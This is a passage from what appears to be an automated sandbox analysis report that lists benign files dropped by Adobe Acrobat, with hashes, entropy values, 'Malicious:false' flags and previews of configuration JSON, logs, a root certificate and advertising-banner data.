                                                              SHA-512:3B31C6F34FAF720C964E8CB2FC74D6095B457C1419A63A8CE68703605602CFF49E4E44CBEBF9152CB5719364E616732E74D904C037446714BCAD07823BFCDF88
                                                              Malicious:false
                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379165793078530","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":591625},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):5449
                                                              Entropy (8bit):5.25238832384835
                                                              Encrypted:false
                                                              SSDEEP:96:av+Nkkl+2GAouz3z3xfNLUS3vHp5OuDzUrMzh28qXAXFP74LRXOtW7ANwE7+P7:av+Nkkl+2G1uz3zhfZUyPp5OuDzUwzh2
                                                              MD5:5580126203B163AC56187F0E85120EA2
                                                              SHA1:D7A0BE91249C7F94C95FDE95AE14C40A6AC44932
                                                              SHA-256:507733AAD38F79541D0751978FD17F41FAD90FE05BD68F833912511C91FEE8E6
                                                              SHA-512:466D973AEDD448C763A881F597BD6A1414401218552F35A4276FF756D90F473B56DCF93053087313ADAC457DAA4A7AC24311B8CABFC8A572D29410767D073339
                                                              Malicious:false
                                                              Preview:*...#................version.1..namespace-.X.Bo................next-map-id.1.Pnamespace-c291b69d_46f8_4b09_b54e_d05df8a1271d-https://rna-resource.acrobat.com/.0.>j.r................next-map-id.2.Snamespace-63b958a8_6f71_4fde_913c_6518794b9fd1-https://rna-v2-resource.acrobat.com/.1.J.4r................next-map-id.3.Snamespace-37e4c694_2a8d_4b31_9eb8_e65c5f9e16d5-https://rna-v2-resource.acrobat.com/.2..J.o................next-map-id.4.Pnamespace-d7426d52_3038_4cd9_b9cc_897232425509-https://rna-resource.acrobat.com/.3..M.^...............Pnamespace-c291b69d_46f8_4b09_b54e_d05df8a1271d-https://rna-resource.acrobat.com/..d.^...............Pnamespace-d7426d52_3038_4cd9_b9cc_897232425509-https://rna-resource.acrobat.com/.u..a...............Snamespace-63b958a8_6f71_4fde_913c_6518794b9fd1-https://rna-v2-resource.acrobat.com/..`aa...............Snamespace-37e4c694_2a8d_4b31_9eb8_e65c5f9e16d5-https://rna-v2-resource.acrobat.com/`v.Yo................next-map-id.5.Pnamespace-30587558_ed88_4bd8_adc0_
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):324
                                                              Entropy (8bit):5.142059846944746
                                                              Encrypted:false
                                                              SSDEEP:6:7WGdq2PN72nKuAl9OmbzNMxIFUt8OWGWNJZmw+OWGWNDkwON72nKuAl9OmbzNMFd:7WGdvVaHAa8jFUt8OWGWX/+OWGWF5Oav
                                                              MD5:74F853A2A7E67D2D6701DF718D99EB9F
                                                              SHA1:D54BDA70122EDFEDBCF2E7C0BD5B65875E583CAD
                                                              SHA-256:C5ACE681B0F3B6135C009042756603767B36A566C7BD3B1CB15B4BED6E89A17B
                                                              SHA-512:7674839A023FE5FABAED3E5269F5BBA3B742D61B2FF1494B69A6983538AF4CF40AC2CAEDD59666AEC156C33F6B105E6949B4B20DA02CACF595D0C942F3733C26
                                                              Malicious:false
                                                              Preview:2024/12/19-05:56:22.203 40 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-05:56:22.205 40 Recovering log #3.2024/12/19-05:56:22.205 40 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                              Category:dropped
                                                              Size (bytes):65110
                                                              Entropy (8bit):0.6376462682686903
                                                              Encrypted:false
                                                              SSDEEP:96:Fn1AGmY2nTLKnzN4lu1/4uy47rHMMMxAz:FsY2XQzyQnuc
                                                              MD5:1468EB269F45D6EECE72317AF6B1587F
                                                              SHA1:AB52469CD54F341F71D8EEA78E5293C597CC2560
                                                              SHA-256:56B0D18154217AEBE5F78DAA5DAF7861967BB4B615B7D1FFCDBC3C98C8834393
                                                              SHA-512:FFEF2EC31529E6165D9549A150FC8DA65917002B81A8E4747853AC7F51D88B3AC545862D5EB39684064EE600140C9D0BDAA97D14067C01AA24B17419950781FA
                                                              Malicious:false
                                                              Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11
                                                              Category:dropped
                                                              Size (bytes):86016
                                                              Entropy (8bit):4.445061474826369
                                                              Encrypted:false
                                                              SSDEEP:384:ye6ci5teiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:mxs3OazzU89UTTgUL
                                                              MD5:425E8FCB60B2AD4302966BB61BBBBDD2
                                                              SHA1:D1AF7194D78360782FD1E7B180DED14BCCEA0303
                                                              SHA-256:BBA0F265C9355560102555BD723E8D4C86945B6395EF137CA067CDE89E8A0E56
                                                              SHA-512:D405B2C68724654D81B71562C3157A1AE9165192D2223A84791E285FE411913265A89E0C634AB2AF0DF9BCF461ED37BE32B6413310192FF1D64FEACFC6C35680
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:SQLite Rollback Journal
                                                              Category:dropped
                                                              Size (bytes):8720
                                                              Entropy (8bit):3.7685655875815356
                                                              Encrypted:false
                                                              SSDEEP:48:7MYJioyVQioyhoy1C7oy16oy1uKOioy1noy1AYoy1Wioy1oioykioyBoy1noy1Oz:7fJuQLRXjBizb9IVXEBodRBkI
                                                              MD5:3842057B6004234DC1682BE1D1B904BD
                                                              SHA1:DFE7CB92414B1B79E95DBB2B547985069D5E893A
                                                              SHA-256:A2D414F365C9519A60C3F04F0BD8A097C4EDF7B43DE5E46FDC581A22E197B4BD
                                                              SHA-512:AEB760314FEC225ACA05AFDBBD078E9AF5DD023BDCC4EAB50F3BA8A2AD9D8451FAD60AB55B7AF98745ED5E16CE3BA67A09637B410F521556B80C4B7A4635E002
                                                              Malicious:false
                                                              Preview:.... .c.....c.*................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b.r.l...t...}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:Certificate, Version=3
                                                              Category:dropped
                                                              Size (bytes):1391
                                                              Entropy (8bit):7.705940075877404
                                                              Encrypted:false
                                                              SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                              MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                              SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                              SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                              SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                              Malicious:false
                                                              Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):192
                                                              Entropy (8bit):2.7673182398396405
                                                              Encrypted:false
                                                              SSDEEP:3:kkFklQudypl1fllXlE/HT8kv+h/ltNNX8RolJuRdxLlGB9lQRYwpDdt:kKJSyL2T8m+JdNMa8RdWBwRd
                                                              MD5:BA49A3EA6E6EE3032603FEB1BF933D78
                                                              SHA1:4A7FFF42D301205582870A9BAD6E7CF00E20C428
                                                              SHA-256:8C6758A8EDD12AE33A5C4D0F0A5FF64B4A4B50C17D4669EA34B2ACF1315275CB
                                                              SHA-512:74C69A800D1674E71D9C3FD46AC8D2A0B0A946E9D28C5161F8EB3D3E4B3424262FF45299FB7CD4205806AEF107905D0FFCF70266FA4F33D27C8822A63AF026F3
                                                              Malicious:false
                                                              Preview:p...... .............R..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):295
                                                              Entropy (8bit):5.341043750248797
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXBO+cmxSwR7HUnZiQ0YRMoAvJM3g98kUwPeUkwRe9:YvXKXBO+TLUcs/GMbLUkee9
                                                              MD5:2C335732D50313A7FCAB607CE917382F
                                                              SHA1:BD379427E210EF9D000AB0042EC141FB563F6CFC
                                                              SHA-256:922F8C68D33515BA8EB68DD223426B87A57207BD8497F938125DBF3084278A42
                                                              SHA-512:8E56C0E69CBEC620AE5BBDF854AEEDCE0670FAB20B09EBFAFC50754C538BD1BFF97E2B364610544A09B56D2956523C2358F9BDC5D2135BB3913D350231EBC835
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"624a841d-da44-40e8-a3e7-62f3691e7e40","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734783812885,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):294
                                                              Entropy (8bit):5.292093894146418
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXBO+cmxSwR7HUnZiQ0YRMoAvJfBoTfXpnrPeUkwRe9:YvXKXBO+TLUcs/GWTfXcUkee9
                                                              MD5:35565E485C0C676A54026C6D385E1B54
                                                              SHA1:E9CA3CA7F9CDA8073C5C8B187C6128D77DCB0679
                                                              SHA-256:B77B57DBAA03246528A00866076E31E905C28C7387FDD04C8D9A034FC78B44C6
                                                              SHA-512:6CFCBD9E0278633C42A82DBBEEA68F42ED60E46A9AAE522CD200D8B6D77115E3B717EC98642EF887F041B784E9B904F0D1D2C8F8494DBC94809356587E975480
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"624a841d-da44-40e8-a3e7-62f3691e7e40","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734783812885,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):294
                                                              Entropy (8bit):5.272111610962777
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXBO+cmxSwR7HUnZiQ0YRMoAvJfBD2G6UpnrPeUkwRe9:YvXKXBO+TLUcs/GR22cUkee9
                                                              MD5:D72A085D91D49ECB35C0A73B683E0D35
                                                              SHA1:A998CE15A758CB8BA29B9B002BB4CBE246709ECE
                                                              SHA-256:6F5855E2A19E8DE14EA3C4DF3B5DFAC0F0A0EFD7B3C30A68C91DDC6A8E59F0E6
                                                              SHA-512:B20D55BE12D4E91B5225C0E0C7E4ECE8DBE0A56F256B32CA416DBBFD9D4596BE4319A3F9A595054881D2A27F5CDB3BE73190D5CFB59FC38701BC3E20F62FB7E8
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"624a841d-da44-40e8-a3e7-62f3691e7e40","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734783812885,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):285
                                                              Entropy (8bit):5.320283180787527
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXBO+cmxSwR7HUnZiQ0YRMoAvJfPmwrPeUkwRe9:YvXKXBO+TLUcs/GH56Ukee9
                                                              MD5:A571C9DDAFD5F9719A046D8C6C1220FD
                                                              SHA1:A2667DD49B25DA4F68B384F979954B41E4BFE912
                                                              SHA-256:2052171D1EDDDD55C062AD2609C37DBAAB126F5DADB67FA2CC3E1CDFA16BCEAA
                                                              SHA-512:C242D2146483002B9AEFFA6AA99C93BF787201E8BEF923D9FD917CC9DF104D77854ECFBE4F9B1FA3909B5C5C11EA77CEBE980F67D8D3548E589F79F589490755
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"624a841d-da44-40e8-a3e7-62f3691e7e40","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734783812885,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):1123
                                                              Entropy (8bit):5.688705460315037
                                                              Encrypted:false
                                                              SSDEEP:24:Yv6XBnTL5skpLgE9cQx8LennAvzBvkn0RCmK8czOCCSz:YvE/Bhgy6SAFv5Ah8cv/z
                                                              MD5:6DF09CE77623813A61445A8AA3473D3D
                                                              SHA1:3873EC0E3F8C9563DB6C553F4CDCD64D345DCA07
                                                              SHA-256:D495AC7F49402B8F0678FD6A567FB37047F300072168058D1FFD959D2AC04DD4
                                                              SHA-512:187A1BE6D0299C63A1E7B3C78735752C7D361483371E68D06D233D1664712FC21DA0493FDFDD1BA684FDF972813137337CAD66D84909F48DBC74DD0E1B34FAE2
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"624a841d-da44-40e8-a3e7-62f3691e7e40","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734783812885,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):289
                                                              Entropy (8bit):5.268227390023123
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXBO+cmxSwR7HUnZiQ0YRMoAvJf8dPeUkwRe9:YvXKXBO+TLUcs/GU8Ukee9
                                                              MD5:856CAE42E2620872B494BD144DB2E6FD
                                                              SHA1:B45130561F406A241B208C1E0E91F3AEBCC450FD
                                                              SHA-256:FBD64891A9E32E0454F07EBE22B9A0F3916C3F5D108B42AD53406117AFA5E1BB
                                                              SHA-512:C3F98CFB7B1CD82F51AD62ACC88B6AEC801EB0162E41FF98F93934B33C1AE759F8EF45DB0F257BCFD393A9BFCD14530294557DC2C3E3A85776D68EB369C8025B
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"624a841d-da44-40e8-a3e7-62f3691e7e40","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734783812885,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):292
                                                              Entropy (8bit):5.270962086808989
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXBO+cmxSwR7HUnZiQ0YRMoAvJfQ1rPeUkwRe9:YvXKXBO+TLUcs/GY16Ukee9
                                                              MD5:637B25AF1B9C9F7BE522820B7D8D4729
                                                              SHA1:63EF1258B64C0349E0D98BB91EB8B612480F6D58
                                                              SHA-256:E412305D480328D2F024B1AD66EDF1A3F5510267FC6E3210C5474641DCE88488
                                                              SHA-512:71EE2757C019EFB2B20E8C39DDC6BBFE4179E4C84C1983384656C2B042A654735491416C475B4A7F32E50A1CDC729EBA60C2CD68E4B6D5B70DF1ECEE91A13DD0
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"624a841d-da44-40e8-a3e7-62f3691e7e40","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734783812885,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):289
                                                              Entropy (8bit):5.277656074589669
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXBO+cmxSwR7HUnZiQ0YRMoAvJfFldPeUkwRe9:YvXKXBO+TLUcs/Gz8Ukee9
                                                              MD5:60246A25BA45294413BDA134824D611A
                                                              SHA1:4E25E4FC9969B594336D243470E19C0835BB87D2
                                                              SHA-256:53C232C29559FE8987419F7F20EB5BEE1CAB0DFA5E696FD958E6A10CC9B7FA97
                                                              SHA-512:747F070D888603AF7D1D4AB9E51AE330313002BB96D2BCDE555E88771FA7900F25C857623D4AB567EBEE72286D89AC467A52EABE0792DCFF25818783BF2EFF2B
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"624a841d-da44-40e8-a3e7-62f3691e7e40","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734783812885,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):295
                                                              Entropy (8bit):5.2937146192471625
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXBO+cmxSwR7HUnZiQ0YRMoAvJfzdPeUkwRe9:YvXKXBO+TLUcs/Gb8Ukee9
                                                              MD5:16074B8DC74088F39A03AFFFB96C93AA
                                                              SHA1:6E5964444D79E423D0D0A230CEA37E31A3D0E9EA
                                                              SHA-256:1DBD7837AFE1EAB602BFAF0BD57D0E8F693EF3DBB5AB23FC7D4C0FC810EF7F82
                                                              SHA-512:E7E61F1CBD9DEB0A66607D6FB358EC51AF0293DC7F1B51AD5969EE61110BFE7B46AA171B3FA05FAA0D09307FC77264BA628BDFB4B91BB1B88170EA6A63BED1BF
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"624a841d-da44-40e8-a3e7-62f3691e7e40","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734783812885,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):289
                                                              Entropy (8bit):5.274103334320961
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXBO+cmxSwR7HUnZiQ0YRMoAvJfYdPeUkwRe9:YvXKXBO+TLUcs/Gg8Ukee9
                                                              MD5:D8A50C6496ADD38D6003CEAB6B3B0368
                                                              SHA1:76818B82721402AB9338EC87BF420BAFE2146B26
                                                              SHA-256:15E09955E802A51B4C061ED74CDED6AF4EFBEFACE33730B427653D2145BB3D35
                                                              SHA-512:8C5EFCCA942F7482290B1B1ABD644E7A883E7E11AD5CE6A01889686F173634990F03BE14E668DFE664F1A656AE2CDABA0B041634892751029D928E31CB54DC8E
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"624a841d-da44-40e8-a3e7-62f3691e7e40","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734783812885,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):284
                                                              Entropy (8bit):5.2605466209208345
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXBO+cmxSwR7HUnZiQ0YRMoAvJf+dPeUkwRe9:YvXKXBO+TLUcs/G28Ukee9
                                                              MD5:853819AFC5432486CE9E2EF2340B67AD
                                                              SHA1:0205987E8BF13EF73E24C5CB9B06C2B5F9968650
                                                              SHA-256:DF3486F3013F48B136E8AF688A0D8208E4CED74FF0148E6AE1E21D26CC3993E9
                                                              SHA-512:22807CAC3B31525E56CBD751E5F1ED5FAB5BED22A0BF713072ABCF6CFCFB05660536CC4F0D74E10C3DB37AD2F109E0DB03737764CD6E09AF4602BFC60D024425
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"624a841d-da44-40e8-a3e7-62f3691e7e40","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734783812885,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):291
                                                              Entropy (8bit):5.257828415951381
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXBO+cmxSwR7HUnZiQ0YRMoAvJfbPtdPeUkwRe9:YvXKXBO+TLUcs/GDV8Ukee9
                                                              MD5:D6B7AD4AC099D8B81CB29458EF63A1E1
                                                              SHA1:D3B92C4801A38691EF0A72B767A25201BF032822
                                                              SHA-256:43862BB749D15160489172726651E031A1DA3B8310D0C3098A7F291814CA4389
                                                              SHA-512:7EE335EBC25F44190135CAA75CC1B72E7A2BD41E733E4DCC7704310D7A6A3ACF9C279874F2BD2BB41C8D100DE35EA0BAB7D9FCF2C7EBC5188A77D199F2B9D232
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"624a841d-da44-40e8-a3e7-62f3691e7e40","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734783812885,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):287
                                                              Entropy (8bit):5.261147153326143
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXBO+cmxSwR7HUnZiQ0YRMoAvJf21rPeUkwRe9:YvXKXBO+TLUcs/G+16Ukee9
                                                              MD5:5C0132DAA3F01FCAB115B881FE450650
                                                              SHA1:744B6A15FEF32A7CAB31AB49655414BDD518F07A
                                                              SHA-256:13B3ADFB89C9821827478B235967FA16929C065CAEF56E9DE83A5BAFD94214BB
                                                              SHA-512:7CAD27E668AEB6EC21BEE4E0CD139569BFF5746280CCD3105929CC028B2D0668426DDBA69896DD383A029E6C51C2E5FE4B037FEBFF4ED49CC23BE93E08507DBB
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"624a841d-da44-40e8-a3e7-62f3691e7e40","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734783812885,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):1090
                                                              Entropy (8bit):5.665206969351102
                                                              Encrypted:false
                                                              SSDEEP:24:Yv6XBnTL5sAamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSz:YvE/NBgkDMUJUAh8cvMz
                                                              MD5:77DAB757DEEBCDA4E1CAAAB3DA2A0DDD
                                                              SHA1:6F7B409284B12A992178E53C3695EBFB96BB06DD
                                                              SHA-256:840234232FBAE7E82EE16514262AA2DC51062962612C995CC3523AE8D625AD10
                                                              SHA-512:714462599D642AF074725D4BF27692BF9078488475B1E74DDECE9B5F714DF4C5D7B5AFB210A94DD1DC30075FD8EE078855E42405BE99A1CE349528BDA98841DE
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"624a841d-da44-40e8-a3e7-62f3691e7e40","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734783812885,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):286
                                                              Entropy (8bit):5.238217592221981
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXBO+cmxSwR7HUnZiQ0YRMoAvJfshHHrPeUkwRe9:YvXKXBO+TLUcs/GUUUkee9
